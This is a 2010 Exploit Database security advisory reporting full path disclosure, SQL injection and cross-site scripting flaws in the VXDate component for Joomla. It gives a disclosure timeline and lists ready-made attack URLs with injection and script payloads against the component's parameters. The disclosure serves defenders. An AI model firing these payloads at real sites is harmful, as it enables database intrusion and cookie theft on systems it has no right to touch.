Joomla! Component com_vxdate – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： MustLive
  日期： 2010-03-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11790/

• -------------------------------------------------------------------------------------------------------------
  
  I want to warn you about vulnerabilities in component VXDate for Joomla.
  
  
  -----------------------------
  
  Advisory: Vulnerabilities in VXDate for Joomla
  
  -----------------------------
  
  URL: http://websecurity.com.ua/3849/
  
  -----------------------------
  
  Timeline:
  
  
  
  10.05.2009 - found the vulnerabilities.
  
  12.01.2010 - announced at my site.
  
  18.01.2010 - informed developers.
  
  13.03.2010 - disclosed at my site.
  
  -----------------------------
  
  Details:
  
  These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities.
  
  
  Full path disclosure:
  
  http://site/index.php?option=com_vxdate&ct=’
  
  http://site/index.php?option=com_vxdate&ct=1&md=details&id=’
  
  http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’
  
  
  
  SQL Injection:
  
  http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
  
  http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5
  
  
  XSS:
  
  http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  
  http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  
  Vulnerable are potentially all versions of VXDate.